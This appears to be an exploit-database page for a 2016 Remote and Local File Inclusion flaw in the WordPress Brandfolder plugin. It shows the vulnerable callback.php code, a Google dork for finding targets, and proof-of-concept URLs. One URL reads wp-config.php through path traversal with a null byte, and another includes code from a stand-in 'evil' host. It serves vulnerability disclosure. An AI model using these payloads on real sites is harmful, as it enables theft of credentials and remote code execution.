header-logo
Suggest Exploit
vendor:
Brandfolder Plugin
by:
AMAR^SHG
8,8
CVSS
HIGH
Remote File Inclusion (RFI) & Local File Inclusion (LFI)
98
CWE
Product Name: Brandfolder Plugin
Affected Version From: <=3.0
Affected Version To: <=3.0
Patch Exists: YES
Related CWE: N/A
CPE: a:brandfolder:brandfolder_plugin
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WAMP / Windows
2016

WordPress brandfolder plugin / RFI & LFI

The vulnerability occurs at the first lines of the file callback.php, where the user input is based on the $_REQUEST variable. An attacker can depending on the context, host on a malicious server a file called wp-load.php, and disable its execution using an htaccess, or abuse the null byte character ( %00, %2500 url-encoded).

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress brandfolder plugin / RFI & LFI
# Google Dork: inurl:wp-content/plugins/brandfolder
# Date: 03/22/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: https://brandfolder.com
# Software Link: https://wordpress.org/plugins/brandfolder/
# Version: <=3.0
# Tested on: WAMP / Windows

I-Details
The vulnerability occurs at the first lines of the file callback.php:

<?php
  ini_set('display_errors',1);
  ini_set('display_startup_errors',1);
  error_reporting(-1);

  require_once($_REQUEST['wp_abspath']  . 'wp-load.php');
  require_once($_REQUEST['wp_abspath']  . 'wp-admin/includes/media.php');
  require_once($_REQUEST['wp_abspath']  . 'wp-admin/includes/file.php');
  require_once($_REQUEST['wp_abspath']  . 'wp-admin/includes/image.php');
  require_once($_REQUEST['wp_abspath']  . 'wp-admin/includes/post.php');

$_REQUEST is based on the user input, so as you can guess,
an attacker can depending on the context, host on a malicious server
a file called wp-load.php, and disable its execution using an htaccess, or
abuse the null byte character ( %00, %2500 url-encoded)

II-Proof of concept
http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=LFI/RFI
http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00
http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=http://evil/

Discovered by AMAR^SHG (aka kuroi'sh).
Greetings to RxR & Nofawkx Al & HolaKo

Navigation

Suggest Exploit

Services By CQR